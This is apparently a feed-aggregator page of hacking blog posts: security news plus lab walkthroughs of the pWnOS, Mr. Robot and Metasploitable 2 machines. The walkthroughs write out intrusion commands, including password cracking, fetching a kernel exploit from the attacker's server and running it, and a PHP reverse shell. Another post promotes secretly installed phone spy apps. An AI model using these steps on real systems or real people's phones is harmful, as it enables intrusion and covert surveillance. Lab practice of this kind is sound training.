Loading...

Follow Kamran Mohsin - Cyber Security, Hacking Blog on Feedspot

Continue with Google
Continue with Facebook
or

Valid

Facebook, Instagram, and WhatsApp are all experiencing issues this morning for users worldwide. Facebook and Instagram are both inaccessible, with news feeds refusing to refresh and the main Facebook.com domain unavailable.

Reports on Twitter suggest that some users are unable to send or receive messages on WhatsApp. On Instagram, feeds refuse to load or refresh.

The post Facebook, WhatsApp, Instagram Down Worldwide appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 


On 14 February 2019, a convoy of vehicles carrying security personnel on the Jammu Srinagar National Highway was attacked by a vehicle-borne suicide bomber at Lethpora (near Awantipora) in the Pulwama district, Jammu and Kashmir, India.

In the retaliation, Indian I Crew Team hacked into several Pakistani websites showing their level of anger.

In the mean time I Crew hacked into one of the Pakistan’s renowned University portal. Following defacement was uploaded by the team.

I Crew shared their message on the defaced page.

Don’t trust your development. Minor bugs can result in reputation or financial damage.

The post Riphah University Admission Portal Hacked appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

It’s been a long time, since I wrote a blog. I hope this time I continue writing with a vulnerable machine walk through.

You can easily download image for this VM from vulnhub.

The walk through will be in detail. Let’s start with this machine.

I have already hosted this virtual machine in my vmware workstation. You will prompt with below image once you start pWnOS machine whether in vmware workstation or in virtual machine.

pWnOS machine booted

I have already logged into my Kali machine. Its time to get the IP address of pWnOS machine by a command utility prebuilt in Kali i.e. netdiscover as seen below:

netdiscover

Knowing about the services running on target machine helps to build an attack surface. We use Nmap; a command-line utility to find services running on various ports on target system.

nmap

Various ports are open, we see that MiniServ 0.01 (Webmin httpd) server is running on port 10000, after googling I found that the target system is using vulnerable version. Luckily I found an exploit in Metasploit.

available exploit Ist Method

Using the highlighted auxiliary module.

We see RPATH variable is set to /etc/passwd by default, let’s extract it:

/etc/passwd

Now set the RPATH variable to /etc/shadow and extract it too:

/etc/shadow

We got 5 hashes from shadow file, save the hashes in shadow.txt file as shown in command below.

John the ripper; a command-line utility will help to crack them using the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt

Luckily, John cracked 1 hash out of 5.

This cracked hash helped us to login via SSH as shown below:

Let’s see what rights/privileges vmware (user) have:

As we saw vmware got no rights/privileges, we further investigate about the kernel.

After googling we found the following exploit for vulnerable version of kernel, you can easily find it in Kali via searchsploit.

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

I have started apache2 web server on my kali machine to host this exploit publicly by the following command:

service apache2 start

Copy the exploit to web server.

cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/

Now download the exploit in victim machine via limited shell and then compile the C program via gcc compiler which is pre-installed in Linux.

wget http://192.168.10.8/5092.c
gcc 5092.c -o exploit
./exploit

Hurray we got into root 😉

2nd Method

There is another method too. As we came across /etc/passwd, we saw that there were few users mentioned at the very end. Each user can login to pWnOS via SSH. Each user has authorized keys that are present in root directory but in a hidden directory .ssh, let’s get it via RPATH variable.

authorized key of vmware user

You might be thinking why we are interested in searching for authorized keys. Well, in this scenario we are lucky enough to have file disclosure vulnerability and we do have access to authorized keys file placed in home directory of each user. Each authorized key is mapped to RSA key.

Now from where to get RSA keys? Good question 😀 Google solved this problem too. Below link has a repository of keys both for 1024 and 2048 bits. But here we need 2048 bits of RSA keys.

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Below command will download the set of RSA keys. I have already downloaded into my Kali machine.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Now extract the file with the following command:

tar vxjf 5622.tar.bz2

Its time for brute forcing (to find the combination of authorized keys and RSA keys).

cd rsa
grep -lr authorized_key

We got it, now login via SSH and run the local Privilege Escalation exploit as we did in Ist method.

ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.10.10

Hurray we got into root again 😀

If you are interested in reading configuration of SSH Key-Based Authentication on a Linux Server, do read my blog post here.

Thanks for stopping by here, if you like this blog post do leave a comment below.

The post pWnOS: 1.0 Vulnerable Machine Walkthrough appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

On Monday, Zerodium, a startup that buys and sells hacking tools and exploits to governments around the world, announced price increases for almost everything they are looking for, such as iOS remote jailbreaks and Windows exploits. It said it will now pay security researchers $1,000,000 for exploits in WhatsApp, iMessage, and SMS/MMS apps for all mobile operating systems.

“Messaging apps in general and WhatsApp in particular are sometimes the only communication channel used by targets and end-to-end encryption makes it difficult for our government customers to intercept such communications,” Zerodium’s founder Chaouki Bekrar told Motherboard in an online chat. “So having the ability to remotely compromise these apps directly without compromising the whole phone is much more strategic and effective.”

Read complete article on Vice.com

The post Get $1 Million for Hacking WhatsApp and iMessage appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

The US National Counter-Intelligence and Security Center which is responsible for the security and counter intelligence efforts has started a campaign against cyber threats that are propagating over the companies in US. With all these threats and menaces the companies haven’t taken serious measures to counter themselves against cyber attacks.

Trump administration on Monday launched a drive to push US firms to better protect their trade secrets from foreign hackers, following a slew of cases accusing individuals and companies of economic espionage for China.

US companies have recently hit by recent attacks included Hewlett Packard Enterprise Co and International Business Machines Corp.

The US National Counter-Intelligence is worried about cyber attacks on US government agencies and the private sector from China, Russia, North Korea and Iran.

The post Trump Administration Forces Major Firms to Protect Their Trade Secrets From Foreign hackers appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

An alleged hacker who reportedly threatened to sell the personal details of 319 million iCloud users is having his day in court. IT analyst Kerem Albayrak, 21, filmed himself accessing accounts and posted the footage on YouTube, it was said.

Albayrak, who is Turkish, works as a freelance and founded firms Vasinity Digital and Verticle Media.

He then allegedly demanded more than $174,000 worth of Bitcoin and $1,100 iTunes vouchers from tech giant Apple in return for calling off his plan.

The post Alleged hacker threatens Apple to sell details of 319 million Apple iCloud users appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

The digital revolution has immensely influenced our lives and today our lives heavily depend on the cell phones, gadgets, and computer machines. All of this tech –inventions have made our lives easier than ever before. Now we can make long and short cell phones calls within cheap rates, we can use social media apps such as Facebook, Yahoo, Line, Vine, Tinder, Whatsapp, Snapchat, and plenty of others alike.

The social media apps enable a user to make chat conversations, text messages, share media files such as photos and videos and last but not the least Voice messages through WhatsApp, IMO, Facebook and Telegram. Having all the advantages, the young generations, on the other hand, are getting trapped by cyber predators such as cyber bullies. Online bullies are present on the social messaging apps and they are in large numbers and always looking forward to approaching young kids and teens to tease, squeeze and humiliate them online. Therefore, parents really feel concerned for the online protection of the children.

Effects of cyber bullying on children

Online bullying has its dangerous effects on children, teens and even adults all feel very distressed and alone when being bullied online. The victim of cyberbullying really feel helpless and overwhelmed and they can feel embarrassment and they have to live with this unpleasant time and most of the victim such as teens feel ashamed of themselves is not able to deal with.

However, young kids and teens who are the victim of online bullying don’t want to visit the place again where he/she has been bullied such as particular social media platform or school in real-life. They remain under the continuous source of stress and worry. However, they may get health issues such as depression, anxiety, and psychotic disorders. However, young teens have reportedly attempted suicide after being bullied online or in real life number of times.

Cyber Bullying stats

  • 20% of the young kids and teens who are being bullied online don’t want to go to the place where they bullied either online or in real life
  • 5% of the victims start self –harming activities
  • 3% of the victims especially teens commit suicide being bullied online
  • Mostly young kids and teens are more likely to bullied online while using Facebook social media app
  • 28% of the teens and kids have reportedly bullied online using twitter

Do you know Kamran Mohsin Blog is ranked TOP 75 Hacker Blog on Internet by Feedspot?

 Protect children from cyber bullying using parental control app

First and foremost, all you need to do is to subscribe for cell phone spy app and you will get an email that contains credentials. Moreover, you need to get access to the target device and then install the mobile phone monitoring app on the target phone. When you have done with the installation process then activate it on the target device. Before you are completing the particular process, you will get a message on the screen either you want to use it secretly on the target device or not. Then chose the best option and activate on the target device. Furthermore, you need to use the passcode and ID in order to get access to the online control panel of the mobile phone surveillance software. Once you have got access to the dashboard of the mobile phone tracking app. Then you need to visit the cell phone tracking app tools in order to monitor your kids and teens to protect them from cyber bullying.

Use android monitoring app tools & protect teens from bullying

You can use IM’s social media and can view IM’s logs such as chat conversations, text messages, audio and video conversations, shared media such as photos and videos and Voice messages. You can monitor live calls with secret calls recorder and record and listen to the live calls. You can also view text messages with text messages spy and can view SMS, MMS and heads up tickers notifications. However, you can do the live screen recording of all the instant messaging apps and get to know your children social media activities. Furthermore, you can remotely control your children activities and protect them from all online dangers and cyber predators including cyberbullies with remotely phone controller. You can view installed apps, block text messages, block incoming calls and block access to the internet on the target cell phone device. Moreover, you can track the location of kids and teens with GPS location tracker if they don’t come home once bullied online or in real life. This will really help you out to track their current and exact location.

Conclusion:

If you’re worried about your children digital activities especially on social media apps and you don’t want your kids to be a victim of cyberbullying. Then you need to use the mobile phone spy app for androids and stay updated about kids and teens cell phone activities connected to the internet.

Are you interested in reading exploitation of vulnerable machine “Mr. Robot”? Click here to read complete walk-through. 

Thinking to write and share guest blogs on kamranmohsin.com? Click here.

The post How to safeguard your Kids from Cyber bullying? appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Mr. Robot is a vulnerable machine, which has different ports opened. The goal of this machine is to break the security of target machine and find the 3 keys stored in it. The walkthrough is explained below in detail.

Once you fire up Mr. Robot VM in your virtual box or vmware/player, you will get the below screen.

You can download Mr. Robot virtual machine from here.

Okay let’s try to break into the machine, hope you enjoy the journey with me 😀

1. Discover all the live hosts in a network with netdiscover.

2. Discover the running ports and applications running on it with nmap.

3. Discover all the directories on web server using dirb.

4. Check robots.txt file.

5. We got key 1 (out of 3 keys) that was placed in robots.txt file.

6. We found another file fsocity.dic that was also available in robots.txt. After opening it, we found that it is a wordlist with duplicated data. Therefore, we tried to compile a unique data and saved in shortfsocity.dsc.

Note: Target IP is changed below; it’s 192.168.1.46 and the local IP of my attacker [Kali] machine is 192.168.1.54

7. For http-post-form we got a http post request form.

8. After a little bit research with nikto/source code analysis, we found that the website is running WordPress, so we jumped onto /wp-admin or wp-login and tried fuzzing. The result was not fair enough, so we used fsocity.dic as a wordlist in hydra to bruteforce username and password.

9. We successfully got username and through the same wordlist file, we started finding password.

10. The username and password we got are Elliot and ER29-0652. Login through wp-login and see what we got interesting in WordPress dashboard. Luckily, we opened into the dashboard, now try to upload a reverse shell for remote connection. We uploaded Pentestmonkey’s php reverse shell in zip.

11. Unfortunately, I did not get remote connection (Shell) through plugins. I copied PHP reverse shell code and pasted in 404 page and the code successfully worked.
Note: IP should be of your kali machine.

12. Open netcat connection first on port 1234 that was specified in the php reverse shell code.

Open any random page on target IP that does not exist.

13. Let us see which shell we got with netcat.

14. We got a limited shell. Now we try for a bash shell. For that, we check if python is installed on target system. We a spawn a bash shell and got access to daemon account.

15. We got key 2 file but we didn’t have permissions to open it. We got access to another file that has a secret hash.

16. Let us try to break the hash first.

17. The hash was cracked and we got password of robot account that has access to key 2 file.

18. After getting 2 keys we moved into root folder but we were not able to open key 3 file due to limited privileges assigned for robot account.
We check if the applications running on target system can be used to get access to root account.

19. Look for any out dated service running on target system that we mounted in tmp directory.

20. Luckily, we found nmap (version 5.3.4) on target system, which provides interactive shell to get root access.

21. Through nmap (interactive mode), we achieved key 3 (out of 3 keys) in root folder that only a root account can access.

Congratulations !!!

Here is the root flag. Hope to see you soon … !!!

Read another CTF here. More CTFs are coming soon.

If you are interested in writing guest blogs, please visit this page.

The post Privilege Escalation in Mr. Robot CTF appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Top 75 Hacking Websites and Blogs for Hackers

Kamran Mohsin blog has been selected in top 75 hacker blog list by Feedspot.

Top 75 Hacking Websites and Blogs for Hackers

I got personal mail from the founder of Feedspot:

“I would like to personally congratulate you as your blog Kamran Mohsin has been selected by our panelist as one of the Top 75 Hacker Blogs on the web.
I personally give you a high-five and want to thank you for your contribution to this world. This is the most comprehensive list of Top 75 Hacker Blogs on the internet and I’m honored to have you as part of this!
Also, you have the honor of displaying the following badge on your blog. Use the below code to display this badge proudly on your blog.”

Message from Anuj Agarwal; founder of Feedspot:

The Best Hacker blogs from thousands of Cyber Security blogs in our index using search and social metrics.

We’ve carefully selected these websites because they are actively working to educate, inspire, and empower their readers with frequent updates and high-quality information.

These blogs are ranked based on following criteria:

  • Google reputation and Google search ranking
  • Influence and popularity on Facebook, twitter and other social media sites
  • Quality and consistency of posts.
  • Feedspot’s editorial team and expert review
Top 75 Hacker Blogs Winners

CONGRATULATIONS to every blogger that has made this Top Hacker Blogs list! This is the most comprehensive list of best Hacker blogs on the internet and I’m honoured to have you as part of this! I personally give you a high-five and want to thank you for your contribution to this world.

If your blog is one of the Top 75 Hacker blogs, you have the honour of displaying the following badge on your site. Use the below code to display this badge proudly on your blog. You deserve it!

The post Kamran Mohsin awarded Top 75 Hacker Blog on Internet by Feedspot appeared first on Kamran Mohsin.

  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

After a break of months, I finally urged myself to start writing information security blogs again. Hope, I do my best to deliver a valuable information to my readers. This time I’d be starting with writing walkthroughs and privilege escalation of vulnerable machines / capture the flag (CTF).

I picked Metasploitable virtual machine i.e. an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Mestaploitable version 2 can be downloaded from here. This virtual machine is compatible with VirtualBox, VMWare, and other common virtualization platforms. In this blog, we will try our best to cover privilege escalation in metasploitable 2 machine.

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user – read more.

Note: For privilege escalation we should get limited shell first.

In metasploitable 2, we can get limited shell through various services running on the system.

1. We used nmap (Network Mapper) to search for running services, and ended up finding telnet running with default username and password on metasploitable 2.

Telnet is a program used to establish a connection between two computers. It is inherently insecure because it transmits data in clear text.

On the Kali box, open a terminal, and telnet to the Metasploitable VM. Login with the ‘msfadmin:msfadmin’ credentials.

2.The logged in user is msfadmin (not root account).

3. Following is the Linux version (out-dated).

4. By looking at the Linux kernel version I googled for its exploit. Luckily, I found exploit for it.
https://www.exploit-db.com/exploits/8572/

5. I downloaded the exploit and by using vim utility, I saved the exploit in exploit file. After that, I converted the file to .C extention (C langauage).

6. Let us see the exploit.

7. Compile c into binary file exploit with gcc uility.

8. Search for any process running with a PID. We can use any PID (but should be non-zero).

9. Confirm the process ID (PID). It should be increased by one in following mode.

10. The exploit for kernel will use/run the below code to run as a root user once a Netcat connection has been established.

11. Open a netcat connection on port 1337 (assigned in tmp/run file). Launch exploit with the PID 2770 (shown above). We successfully got a bash shell on target system.

Hurrah we did it. I look foward to share more CTF’s with you. I’d like to hear from you, share your thoughts in below comments area.

If you are interested to learn about Ethical Hacking and Penetration Testing, I would like you to read the following blog.

The post Privilege Escalation in Metasploitable 2 Machine appeared first on Kamran Mohsin.

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview